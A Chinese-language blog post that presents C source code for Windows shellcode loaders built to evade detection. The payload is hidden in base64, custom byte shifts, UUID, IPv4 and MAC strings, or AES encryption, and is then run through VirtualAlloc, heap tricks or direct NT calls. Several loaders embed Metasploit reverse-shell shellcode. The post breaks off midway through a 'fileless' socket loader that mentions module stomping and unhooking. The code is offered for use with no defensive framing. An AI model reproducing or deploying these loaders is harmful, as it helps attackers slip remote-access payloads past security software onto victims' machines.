写过不少关于shellcode的文章,可以参看以前的。正好看到一组对shellcode加密手法的源码,难度不大,推荐给大家,开个脑洞。这个包含:简单的 shellcode 加载器,编码器(base64 - 自定义 - UUID - IPv4 - MAC),加密器(AES),无文件加载器(Winhttp,Sockets)。截图如下:
2、Encoding:
2-1、Base64 Loading
2-2、Custom Encoding:
2-3、UUID shellcode:
2-4、IPv4 shellcode:
2-5、MAC shellcode:
3、Encrypting:
3-1、AES:
4、FileLess shellcode:
4-1、Using Sockets:
4-2、Using WinHttp:
不多说,上代码。
1、简单加载
intmain(){// use payload/windows/x64/shell_reverse_tcp// generate -f cunsignedcharpayload[] ="xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52""x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48""x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9""x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41""x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48""x01xd0x8bx80x88x00x00x00x48x85xc0x74x67x48x01""xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48""xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0""xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4c""x24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0""x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04""x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59""x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48""x8bx12xe9x57xffxffxffx5dx48xbax01x00x00x00x00""x00x00x00x48x8dx8dx01x01x00x00x41xbax31x8bx6f""x87xffxd5xbbxe0x1dx2ax0ax41xbaxa6x95xbdx9dxff""xd5x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb""x47x13x72x6fx6ax00x59x41x89xdaxffxd5x63x61x6c""x63x2ex65x78x65x00";LPVOID alloc_mem = VirtualAlloc(NULL,sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if(!alloc_mem) {printf("Failed to Allocate memory (%u)n", GetLastError());return-1;}MoveMemory(alloc_mem, payload,sizeof(payload));//RtlMoveMemory(alloc_mem, payload, sizeof(payload));DWORD oldProtect;if(!VirtualProtect(alloc_mem,sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {printf("Failed to change memory protection (%u)n", GetLastError());return-2;}HANDLE tHandle = CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)alloc_mem,NULL,0,NULL);if(!tHandle) {printf("Failed to Create the thread (%u)n", GetLastError());return-3;}printf("nnalloc_mem : %pn", alloc_mem);WaitForSingleObject(tHandle, INFINITE);getchar();return0;}
2、Encoding:
2-1、Base64 Loading
intmain(void){// calc//const char payload[] = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA";// reverse shellconstcharpayload[] ="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATSZFuwDUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1VBQTTHJTTHASP/ASInCSP/ASInBQbrqD9/g/9VIicdqEEFYTIniSIn5QbqZpXRh/9VIgcRAAgAASbhjbWQAAAAAAEFQQVBIieJXV1dNMcBqDVlBUOL8ZsdEJFQBAUiNRCQYxgBoSInmVlBBUEFQQVBJ/8BBUEn/yE2JwUyJwUG6ecw/hv/VSDHSSP/Kiw5BugiHHWD/1bvgHSoKQbqmlb2d/9VIg8QoPAZ8CoD74HUFu0cTcm9qAFlBidr/1Q==";DWORD payloadLen =sizeof(payload);LPVOID alloc_mem = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if(!alloc_mem) {printf("Failed to allocate memory (%u)n", GetLastError());return-1;}// base64 decodingif(!CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)alloc_mem, &payloadLen,NULL,NULL)) {printf("Failed to decode the payload(%u)n", GetLastError());return-2;}DWORD OldProtect;if(!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {printf("Failed to change memory protection (%u)n", GetLastError());return-3;}((void(*)())alloc_mem)();return0;}
2-2、Custom Encoding:
#include <Windows.h>#include <stdio.h>// calc//unsigned char payload[] = { 0xfd, 0x4a, 0x84, 0xe6, 0xf1, 0xea, 0xc1, 0x2, 0x1, 0x2, 0x42, 0x53, 0x42, 0x52, 0x53, 0x53, 0x57, 0x4a, 0x32, 0xd4, 0x66, 0x4a, 0x8c, 0x54, 0x61, 0x4a, 0x8c, 0x54, 0x19, 0x4a, 0x8c, 0x54, 0x21, 0x4a, 0x8c, 0x74, 0x51, 0x4a, 0x10, 0xb9, 0x4b, 0x4c, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x3e, 0x62, 0x7e, 0x3, 0x2e, 0x21, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0xe3, 0xef, 0x53, 0x43, 0x52, 0x4a, 0x8c, 0x54, 0x21, 0x8d, 0x43, 0x3e, 0x49, 0x3, 0xd1, 0x8d, 0x81, 0x8a, 0x1, 0x2, 0x1, 0x4a, 0x86, 0xc2, 0x75, 0x69, 0x49, 0x3, 0xd1, 0x52, 0x8c, 0x4a, 0x19, 0x46, 0x8c, 0x42, 0x21, 0x4b, 0x2, 0xd2, 0xe4, 0x58, 0x49, 0x101, 0xca, 0x43, 0x8c, 0x36, 0x89, 0x4a, 0x2, 0xd8, 0x4e, 0x33, 0xca, 0x4a, 0x32, 0xc2, 0xad, 0x43, 0xc2, 0xcb, 0xe, 0x43, 0x2, 0xc3, 0x39, 0xe2, 0x76, 0xf3, 0x4d, 0x5, 0x4d, 0x26, 0x9, 0x47, 0x3a, 0xd3, 0x76, 0xda, 0x59, 0x46, 0x8c, 0x42, 0x25, 0x4b, 0x2, 0xd2, 0x67, 0x43, 0x8c, 0xe, 0x49, 0x46, 0x8c, 0x42, 0x1d, 0x4b, 0x2, 0xd2, 0x42, 0x8d, 0x5, 0x8a, 0x49, 0x3, 0xd1, 0x43, 0x59, 0x43, 0x59, 0x60, 0x5a, 0x5c, 0x42, 0x5a, 0x42, 0x5b, 0x42, 0x5c, 0x49, 0x85, 0xed, 0x22, 0x42, 0x54, 0x100, 0xe2, 0x59, 0x43, 0x5a, 0x5c, 0x49, 0x8d, 0x13, 0xeb, 0x58, 0x101, 0x100, 0x101, 0x5e, 0x4a, 0xbb, 0x3, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x4a, 0x8e, 0x8f, 0x2, 0x3, 0x1, 0x2, 0x42, 0xbc, 0x32, 0x8d, 0x70, 0x89, 0x100, 0xd7, 0xbc, 0xf2, 0xb6, 0xa4, 0x57, 0x43, 0xbb, 0xa8, 0x96, 0xbf, 0x9e, 0x101, 0xd6, 0x4a, 0x84, 0xc6, 0x29, 0x3e, 0x7, 0x7e, 0xb, 0x82, 0xfc, 0xe2, 0x76, 0x7, 0xbc, 0x49, 0x14, 0x74, 0x70, 0x6c, 0x1, 0x5b, 0x42, 0x8b, 0xdb, 0x101, 0xd6, 0x65, 0x62, 0x6e, 0x64, 0x30, 0x66, 0x7a, 0x66, 0x2 };// reverse shellunsigned char payload[] = {0xfd,0x4a,0x84,0xe6,0xf1,0xea,0xc1,0x2,0x1,0x2,0x42,0x53,0x42,0x52,0x53,0x53,0x57,0x4a,0x32,0xd4,0x66,0x4a,0x8c,0x54,0x61,0x4a,0x8c,0x54,0x19,0x4a,0x8c,0x54,0x21,0x4a,0x8c,0x74,0x51,0x4a,0x10,0xb9,0x4b,0x4c,0x4e,0x33,0xca,0x4a,0x32,0xc2,0xad,0x3e,0x62,0x7e,0x3,0x2e,0x21,0x43,0xc2,0xcb,0xe,0x43,0x2,0xc3,0xe3,0xef,0x53,0x43,0x52,0x4a,0x8c,0x54,0x21,0x8d,0x43,0x3e,0x49,0x3,0xd1,0x8d,0x81,0x8a,0x1,0x2,0x1,0x4a,0x86,0xc2,0x75,0x69,0x49,0x3,0xd1,0x52,0x8c,0x4a,0x19,0x46,0x8c,0x42,0x21,0x4b,0x2,0xd2,0xe4,0x58,0x49,0x101,0xca,0x43,0x8c,0x36,0x89,0x4a,0x2,0xd8,0x4e,0x33,0xca,0x4a,0x32,0xc2,0xad,0x43,0xc2,0xcb,0xe,0x43,0x2,0xc3,0x39,0xe2,0x76,0xf3,0x4d,0x5,0x4d,0x26,0x9,0x47,0x3a,0xd3,0x76,0xda,0x59,0x46,0x8c,0x42,0x25,0x4b,0x2,0xd2,0x67,0x43,0x8c,0xe,0x49,0x46,0x8c,0x42,0x1d,0x4b,0x2,0xd2,0x42,0x8d,0x5,0x8a,0x49,0x3,0xd1,0x43,0x59,0x43,0x59,0x60,0x5a,0x5c,0x42,0x5a,0x42,0x5b,0x42,0x5c,0x49,0x85,0xed,0x22,0x42,0x54,0x100,0xe2,0x59,0x43,0x5a,0x5c,0x49,0x8d,0x13,0xeb,0x58,0x101,0x100,0x101,0x5e,0x4b,0xbf,0x79,0x74,0x34,0x60,0x35,0x33,0x2,0x1,0x43,0x57,0x4b,0x8a,0xe8,0x49,0x83,0xed,0xa2,0x2,0x2,0x1,0x4b,0x8a,0xe7,0x4a,0xbe,0x3,0x2,0x5,0xd4,0x65,0x5d,0xb1,0xf,0x42,0x56,0x4a,0x8b,0xe5,0x4e,0x8a,0xf3,0x42,0xbc,0x4d,0x79,0x27,0x9,0x100,0xd7,0x4d,0x8b,0xeb,0x6a,0x2,0x3,0x1,0x2,0x5a,0x43,0xbb,0x2b,0x81,0x6d,0x1,0x101,0xd6,0x52,0x51,0x4f,0x32,0xcb,0x4e,0x33,0xc1,0x4a,0x100,0xc2,0x49,0x8b,0xc3,0x4a,0x100,0xc2,0x49,0x8b,0xc2,0x43,0xbb,0xec,0x10,0xe1,0xe1,0x101,0xd6,0x4a,0x8a,0xc9,0x6b,0x12,0x42,0x5a,0x4d,0x8b,0xe3,0x4a,0x8a,0xfb,0x42,0xbc,0x9a,0xa7,0x75,0x63,0x100,0xd7,0x49,0x83,0xc5,0x42,0x3,0x2,0x1,0x4b,0xb9,0x65,0x6e,0x66,0x1,0x2,0x1,0x2,0x1,0x43,0x51,0x43,0x51,0x4a,0x8a,0xe4,0x58,0x59,0x58,0x4f,0x32,0xc2,0x6b,0xf,0x5a,0x43,0x51,0xe4,0xfd,0x68,0xc8,0x46,0x25,0x56,0x2,0x3,0x49,0x8f,0x45,0x26,0x19,0xc8,0x1,0x6a,0x49,0x8b,0xe7,0x58,0x51,0x43,0x51,0x43,0x51,0x43,0x51,0x4b,0x100,0xc2,0x42,0x52,0x4a,0x101,0xc9,0x4f,0x8a,0xc3,0x4d,0x8b,0xc2,0x43,0xbb,0x7b,0xcd,0x41,0x87,0x101,0xd6,0x4a,0x32,0xd4,0x49,0x101,0xcb,0x8d,0xf,0x43,0xbb,0xa,0x88,0x1f,0x61,0x101,0xd6,0xbd,0xe1,0x1f,0x2b,0xc,0x42,0xbc,0xa7,0x97,0xbe,0x9f,0x100,0xd7,0x49,0x85,0xc5,0x2a,0x3d,0x8,0x7d,0xc,0x81,0xfd,0xe1,0x77,0x6,0xbd,0x48,0x15,0x73,0x71,0x6b,0x2,0x5a,0x43,0x8a,0xdc,0x100,0xd7};DWORD payloadLen = sizeof(payload);void Decode(unsigned char* payload) {for(inti =0; i < payloadLen; i++) {if(i %2==0) {payload[i]--;}else{payload[i] -=2;}}}intmain() {LPVOID alloc_mem = VirtualAlloc(NULL, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if(!alloc_mem) {printf("Failed to Allocate memory (%u)n", GetLastError());return-1;}Decode(payload);CopyMemory(alloc_mem, payload, payloadLen);DWORD OldProtect;if(!VirtualProtect(alloc_mem, payloadLen, PAGE_EXECUTE_READ, &OldProtect)) {printf("Failed to Change memory protection (%u)n", GetLastError());return-2;}HANDLE tHandle = CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL,0, NULL);if(!tHandle) {printf("Failed to create the Thread (%u)n", GetLastError());return-3;}WaitForSingleObject(tHandle, INFINITE);return0;}
2-3、UUID shellcode:
// Stephan Borosh (rvrsh3ll|@424f424f) & Matt Kingstone for the techniqueintmain(){constchar* uuids[] = {"e48348fc-e8f0-00c0-0000-415141505251","d2314856-4865-528b-6048-8b5218488b52","728b4820-4850-b70f-4a4a-4d31c94831c0","7c613cac-2c02-4120-c1c9-0d4101c1e2ed","48514152-528b-8b20-423c-4801d08b8088","48000000-c085-6774-4801-d0508b481844","4920408b-d001-56e3-48ff-c9418b348848","314dd601-48c9-c031-ac41-c1c90d4101c1","f175e038-034c-244c-0845-39d175d85844","4924408b-d001-4166-8b0c-48448b401c49","8b41d001-8804-0148-d041-5841585e595a","59415841-5a41-8348-ec20-4152ffe05841","8b485a59-e912-ff57-ffff-5d49be777332","0032335f-4100-4956-89e6-4881eca00100","e5894900-bc49-0002-04d2-645bb00d4154","4ce48949-f189-ba41-4c77-2607ffd54c89","010168ea-0000-4159-ba29-806b00ffd550","c9314d50-314d-48c0-ffc0-4889c248ffc0","41c18948-eaba-df0f-e0ff-d54889c76a10","894c5841-48e2-f989-41ba-99a57461ffd5","40c48148-0002-4900-b863-6d6400000000","41504100-4850-e289-5757-574d31c06a0d","e2504159-66fc-44c7-2454-0101488d4424","6800c618-8948-56e6-5041-504150415049","5041c0ff-ff49-4dc8-89c1-4c89c141ba79","ff863fcc-48d5-d231-48ff-ca8b0e41ba08","ff601d87-bbd5-1de0-2a0a-41baa695bd9d","8348d5ff-28c4-063c-7c0a-80fbe07505bb","6f721347-006a-4159-89da-ffd590909090"};HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0);void* alloc_mem = HeapAlloc(hHeap,0,0x1000);DWORD_PTR ptr = (DWORD_PTR)alloc_mem;intinit =sizeof(uuids) /sizeof(uuids[0]);for(inti =0; i < init; i++) {RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)ptr);if(status != RPC_S_OK) {printf("UuidFromStringA != RPC_S_OKn");CloseHandle(alloc_mem);return-1;}ptr +=16;}EnumSystemLocalesA((LOCALE_ENUMPROCA)alloc_mem,0);return0;}
2-4、IPv4 shellcode:
intmain(){constchar* IPv4s[] ={"252.72.131.228","240.232.192.0","0.0.65.81","65.80.82.81","86.72.49.210","101.72.139.82","96.72.139.82","24.72.139.82","32.72.139.114","80.72.15.183","74.74.77.49","201.72.49.192","172.60.97.124","2.44.32.65","193.201.13.65","1.193.226.237","82.65.81.72","139.82.32.139","66.60.72.1","208.139.128.136","0.0.0.72","133.192.116.103","72.1.208.80","139.72.24.68","139.64.32.73","1.208.227.86","72.255.201.65","139.52.136.72","1.214.77.49","201.72.49.192","172.65.193.201","13.65.1.193","56.224.117.241","76.3.76.36","8.69.57.209","117.216.88.68","139.64.36.73","1.208.102.65","139.12.72.68","139.64.28.73","1.208.65.139","4.136.72.1","208.65.88.65","88.94.89.90","65.88.65.89","65.90.72.131","236.32.65.82","255.224.88.65","89.90.72.139","18.233.87.255","255.255.93.73","190.119.115.50","95.51.50.0","0.65.86.73","137.230.72.129","236.160.1.0","0.73.137.229","73.188.2.0","4.210.100.91","176.26.65.84","73.137.228.76","137.241.65.186","76.119.38.7","255.213.76.137","234.104.1.1","0.0.89.65","186.41.128.107","0.255.213.80","80.77.49.201","77.49.192.72","255.192.72.137","194.72.255.192","72.137.193.65","186.234.15.223","224.255.213.72","137.199.106.16","65.88.76.137","226.72.137.249","65.186.153.165","116.97.255.213","72.129.196.64","2.0.0.73","184.99.109.100","0.0.0.0","0.65.80.65","80.72.137.226","87.87.87.77","49.192.106.13","89.65.80.226","252.102.199.68","36.84.1.1","72.141.68.36","24.198.0.104","72.137.230.86","80.65.80.65","80.65.80.73","255.192.65.80","73.255.200.77","137.193.76.137","193.65.186.121","204.63.134.255","213.72.49.210","72.255.202.139","14.65.186.8","135.29.96.255","213.187.224.29","42.10.65.186","166.149.189.157","255.213.72.131","196.40.60.6","124.10.128.251","224.117.5.187","71.19.114.111","106.0.89.65","137.218.255.213",};PCSTR Terminator =NULL;PVOID LpBaseAddress =NULL;PVOID LpBaseAddress2 =NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0);if(!hHeap) {printf("Failed to create a heap (%u)n", GetLastError());return-1;}void* alloc_mem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY,0x1000);if(!alloc_mem) {printf("Failed to allocate memory on the heap (%u)n", GetLastError());return-2;}DWORD_PTR ptr = (DWORD_PTR)alloc_mem;intinit =sizeof(IPv4s) /sizeof(IPv4s[0]);for(inti =0; i < init; i++) {RPC_STATUS STATUS = RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)ptr);if(!NT_SUCCESS(STATUS)) {printf("[!] RtlIpv6StringToAddressA failed in %s result %x (%u)", IPv4s[i], STATUS, GetLastError());returnFALSE;}ptr +=4;}HANDLE tHandle = CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)alloc_mem,NULL,0,NULL);if(!tHandle) {printf("Failed to Create the thread (%u)n", GetLastError());return-3;}WaitForSingleObject(tHandle, INFINITE);return0;}
2-5、MAC shellcode:
intError(constchar* msg){printf("%s (%u)", msg, GetLastError());return1;}intmain(){constchar* MAC[] ={"90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90","90-90-90-90-90-90"};introwLen =sizeof(MAC) /sizeof(MAC[0]);PCSTR Terminator =NULL;NTSTATUS STATUS;HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0);void* alloc_mem = HeapAlloc(hHeap,0,0x1000);DWORD_PTR ptr = (DWORD_PTR)alloc_mem;for(inti =0; i < rowLen; i++) {STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator, (DL_EUI48*)ptr);if(!NT_SUCCESS(STATUS)) {printf("[!] RtlEthernetStringToAddressA failed in %s result %x (%u)", MAC[i], STATUS, GetLastError());returnFALSE;}ptr +=6;}HANDLE tHandle = CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)alloc_mem,NULL,0,NULL);if(!tHandle) {printf("Failed to Create the thread (%u)n", GetLastError());return-3;}WaitForSingleObject(tHandle, INFINITE);printf("alloc_memn", alloc_mem);getchar();return0;}
3、Encrypting:
3-1、AES:
#include <Windows.h>#include <stdio.h>#include <wincrypt.h>#pragma comment (lib,"crypt32.lib")#pragma comment(lib,"ntdll")#define NtCurrentProcess() ((HANDLE)-1)#define DEFAULT_BUFLEN4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >=0)#endifEXTERN_C NTSTATUS NtAllocateVirtualMemory(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);EXTERN_C NTSTATUS NtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID* BaseAddress,IN OUT PSIZE_T RegionSize,IN ULONG NewProtect,OUT PULONG OldProtect);EXTERN_C NTSTATUS NtCreateThreadEx(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject(IN HANDLE Handle,IN BOOLEAN Alertable,IN PLARGE_INTEGER Timeout);void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {HCRYPTPROV hProv;HCRYPTHASH hHash;HCRYPTKEY hKey;if(!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {printf("Failed in CryptAcquireContextW (%u)n", GetLastError());return;}if(!CryptCreateHash(hProv, CALG_SHA_256,0,0, &hHash)) {printf("Failed in CryptCreateHash (%u)n", GetLastError());return;}if(!CryptHashData(hHash, (BYTE*)key, keyLen,0)) {printf("Failed in CryptHashData (%u)n", GetLastError());return;}if(!CryptDeriveKey(hProv, CALG_AES_256, hHash,0, &hKey)) {printf("Failed in CryptDeriveKey (%u)n", GetLastError());return;}if(!CryptDecrypt(hKey, (HCRYPTHASH)NULL,0,0, (BYTE*)shellcode, &shellcodeLen)) {printf("Failed in CryptDecrypt (%u)n", GetLastError());return;}CryptReleaseContext(hProv,0);CryptDestroyHash(hHash);CryptDestroyKey(hKey);}intmain(intargc, char** argv) {char AESkey[] = {0x64,0xb5,0x31,0xfe,0xb3,0x6b,0xb3,0x8c,0x88,0x6a,0x4c,0x38,0xc,0xcb,0x19,0x4a};unsigned char AESshellcode[] = {0x8,0x21,0x22,0xeb,0xfa,0xdb,0x42,0x9,0x8e,0x24,0xb6,0x10,0xfb,0x93,0x5b,0xfe,0xc3,0x9d,0x75,0x68,0xcc,0x35,0xd0,0xef,0xfd,0x23,0x70,0xe3,0x1,0x3d,0x8f,0xd0,0xe6,0x5b,0x97,0x5e,0x79,0x78,0x55,0xf9,0xaf,0x71,0x67,0x78,0x3c,0xd9,0x4a,0xe7,0x81,0xc,0xe5,0x50,0x46,0x47,0xa,0x2e,0x79,0x5b,0x6f,0x43,0x4d,0x10,0x2d,0x35,0x93,0x94,0xdd,0x8f,0x36,0x2d,0x3,0xed,0x9,0x33,0xed,0xe3,0xe1,0x43,0x17,0xb6,0xff,0xe9,0x69,0x33,0x1c,0x81,0x83,0xb,0xbf,0x13,0x1c,0x25,0xd5,0x2f,0xb8,0x90,0x6d,0x1e,0xd3,0x11,0xd,0x29,0xf7,0x13,0xde,0x7e,0x71,0x53,0x7,0x44,0xf3,0xf6,0xf6,0xc3,0x54,0xb3,0xaa,0xe1,0xd6,0xbf,0x1e,0xa,0x9c,0x25,0x72,0x9e,0x8b,0x54,0x62,0x1c,0xd9,0x72,0xab,0xbd,0x30,0x47,0x65,0xd2,0x0,0x45,0xb,0xc4,0x16,0xbb,0x80,0xf,0xd4,0x0,0x22,0x40,0xd3,0x4d,0xbb,0x3f,0x64,0xe1,0xa8,0x2a,0x60,0x1e,0xd1,0x0,0xd9,0xb3,0x46,0xb6,0x1c,0xd0,0xe2,0xe1,0x7d,0x99,0x9f,0x8a,0x70,0xd5,0x7d,0x9c,0x88,0xd,0x2d,0xbb,0x4c,0x2a,0x3f,0xeb,0xfd,0xdd,0xad,0x8f,0xba,0xcc,0x87,0x3,0xcf,0x8f,0x15,0x54,0xc5,0xc1,0xa2,0xcb,0x9b,0x14,0xae,0xcb,0x8,0xf,0x5a,0xae,0x6d,0x63,0xf3,0x82,0xe2,0xec,0x79,0xe0,0x1c,0xb1,0x85,0xa9,0x22,0xb0,0x66,0xe9,0x73,0xbe,0xdc,0xac,0xdc,0x7d,0x2e,0xac,0x5d,0x29,0x23,0x44,0x11,0xee,0xbf,0xc9,0x60,0xa2,0x1e,0x7,0x6d,0x9e,0x56,0xf2,0xb4,0x2a,0xb6,0x83,0x4,0xca,0x7e,0xcb,0x7e,0x63,0x8a,0x70,0xa1,0xe5,0x1f,0x6f,0xa,0x21,0x2e,0x5b,0x4c,0x6a,0x62,0x84,0x70,0x33,0x84,0xca,0x48,0x39,0x6b,0x64,0xc6,0x4,0xc6,0x6f,0xe2,0x6d,0x29,0xda,0x78,0x64,0x59,0x13,0xfe,0x2,0x3,0xd9,0xe,0x7e,0x97,0x10,0x7c,0xbd,0x9a,0xf1,0xbf,0xce,0x4e,0x4,0xf1,0x93,0x25,0x88,0x52,0x99,0x44,0xbd,0x52,0x7c,0xfe,0x2c,0xdb,0x50,0x9,0x3b,0x2a,0xd,0x30,0x73,0x3c,0x8c,0xee,0xec,0xb8,0xc8,0xe3,0x3d,0x48,0xed,0xc0,0x4b,0xd1,0x8d,0x48,0x0,0x3,0xd8,0xc,0xde,0x69,0xf9,0xe,0xda,0x31,0xfe,0xb6,0x77,0xc4,0x4d,0x31,0x25,0xc5,0xd1,0xa1,0x11,0x22,0x15,0x8,0xc7,0xa5,0x73,0x19,0x3a,0x87,0x5,0xcc,0x37,0x34,0xad,0x8a,0xfa,0xae,0x6b,0xf8,0x38,0x4a,0x5,0x2e,0x74,0xda,0x77,0x2a,0xa0,0x4f,0xab,0xcd,0xbb,0x2e,0x2f,0xb8,0xf7,0xa1,0x91,0x8e,0x42,0x43,0x85,0xa,0x6b,0xfd,0x6d,0x37,0xd8,0xa,0x53,0x9f,0x54,0x49,0x26,0x2a,0x6d,0x9e,0x85,0x30,0xe5,0xc7,0x91,0x80,0x75,0x79,0xc1,0x2a,0x87,0xc9,0xd0,0x47,0xdd,0xc3,0x9f,0x66,0xf0,0x23,0xf1,0xa2,0x4,0x7e,0xf1,0xd7,0x28,0x1d,0x3b,0xcd,0x2,0x7,0xc,0x72,0x37,0x94,0xa6,0x1b,0x5c,0x6d,0x41};DWORD payload_length = sizeof(AESshellcode);PVOID BaseAddress = NULL;SIZE_T dwSize =0x2000;NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress,0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if(!NT_SUCCESS(status1)) {return1;}// Decrypt the AES payload to Original ShellcodeDecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey));RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode));HANDLE hThread;DWORD OldProtect =0;NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);if(!NT_SUCCESS(NtProtectStatus1)) {return2;}HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread,0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);if(!NT_SUCCESS(NtCreateThreadstatus)) {printf("[!] Failed in sysNtCreateThreadEx (%u)n", GetLastError());return3;}LARGE_INTEGER Timeout;Timeout.QuadPart =-10000000;NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);if(!NT_SUCCESS(NTWFSOstatus)) {printf("[!] Failed in sysNtWaitForSingleObject (%u)n", GetLastError());return4;}return0;}
4、FileLess shellcode:
4-1、Using Sockets:
// credits : @SEKTOR7Module stomping, Module Unhooking, No New Thread, Function obfuscationEXTERN_C NTSTATUSNtAllocateVirtualMemory(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG_PTR ZeroBits,PSIZE_T RegionSize,ULONG AllocationType,ULONG Protect);EXTERN_C NTSTATUSNtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID* BaseAddress,IN OUT PSIZE_T RegionSize,IN ULONG NewProtect,OUT PULONG OldProtect);EXTERN_C NTSTATUSNtCreateThreadEx(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUSNtWaitForSingleObject(IN HANDLE Handle,IN BOOLEAN Alertable,IN PLARGE_INTEGER Timeout);voidRunShellcode(char* shellcode, DWORD shellcodeLen){PVOID BaseAddress =NULL;SIZE_T dwSize =0x2000;PCSTR Terminator =NULL;NTSTATUS STATUS;NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress,0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if(!NT_SUCCESS(status1)) {return;}RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);HANDLE hThread;DWORD OldProtect =0;NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);if(!NT_SUCCESS(NtProtectStatus1)) {return;}HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread,0x1FFFFF,NULL, NtCurrentProcess(), 